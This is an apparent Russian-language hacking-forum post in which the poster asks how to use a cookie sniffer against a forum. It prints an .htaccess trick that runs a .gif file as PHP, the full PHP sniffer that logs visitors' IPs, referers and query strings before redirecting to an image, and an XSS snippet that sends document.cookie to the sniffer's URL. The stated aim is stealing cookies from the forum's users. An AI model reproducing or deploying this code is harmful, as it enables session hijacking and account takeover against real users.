Хмм всеже не догоняю кое что
вот есть сниф состоит он из трех файлов
.htaccess
image.gif -картинка
snif.gif - сам скрип снифа
------------------------------------------
содержание файла .htaccess : и зачем он нужен
Код:
AddType application/x-httpd-php snif.gif
содержание файла snif.gif
Код:
<? // nerezus, 2005, GPL v2 // IF U WANNA USE .png(or .gif, .jpeg) EXT FOR THIS FILE, TYPE AddType application/x-httpd-php .png TO YOUR .htaccess $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.gif'); ?>
А в этом скрипте script>http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script> скрип ссылается на сниф с расширением .php
Если я переименую gif на .php буду ли приходить куки
или можно сослаться на gif в данном xss под этот форум ?!